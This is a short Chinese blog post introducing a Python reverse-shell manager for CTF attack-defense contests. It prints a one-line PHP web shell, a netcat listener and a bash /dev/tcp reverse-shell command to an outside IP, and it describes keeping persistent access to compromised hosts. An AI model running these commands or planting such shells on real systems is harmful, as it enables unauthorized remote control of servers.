[工具介绍] 反弹 shell 管理工具
2017-10-24 本文已影响1103人
王一航
GitHub 仓库
介绍一款基于 Python 开发的 反弹 shell 管理工具 Reverse-Shell-Manager
在 CTF线下赛 的时候 , 如果通过 web 或者 pwn 已经拿到了一台服务器的控制权
那么我们可以使用反弹 shell 来对该服务器进行一个长期的权限维持
一般反弹 shell 的时候我们会怎么做呢 ?
比如说这里有一个台服务器可以 RCE 了
<?php system($_GET[c]);?>
如果要反弹的话 , 我们首先要在自己的服务器上监听一个端口 :
nc -l 8888
然后再在目标服务器上执行 :
bash -c 'bash -i >&/dev/tcp/8.8.8.8/8888 0>&1'
这样就能拿到该服务器的 shell 了
但是
一旦链接断开 , 那么就要重新利用漏洞反弹一个新的 shell
这样是不是很麻烦 , 而且还会暴露漏洞是如何被利用的
如果对方抓取了流量进行分析的话 , 很快就会把漏洞补上
而且
一般线下赛很多时候需要一些自动化的脚本来运维和进行权限维持
所以写了一个小工具 , 希望能有用
大概功能就是 :
监听一个端口 , 可以处理所有连接过来的请求
可以对已经连接的主机进行批量管理 (例如一键获取 flag)
保证一台主机不会出现多个连接
对已经下线的主机进行自动检测
image.png
下面有一个简单的介绍视频 :
使用视频
YouTube (详细 推荐看这个) 使用视频 - 点我查看如果可以给你带来帮助的话 , 可不可以 Star 一下呐 , ヽ(✿゚▽゚)ノ
TODO
1. 端口转发
2. 多层级联
...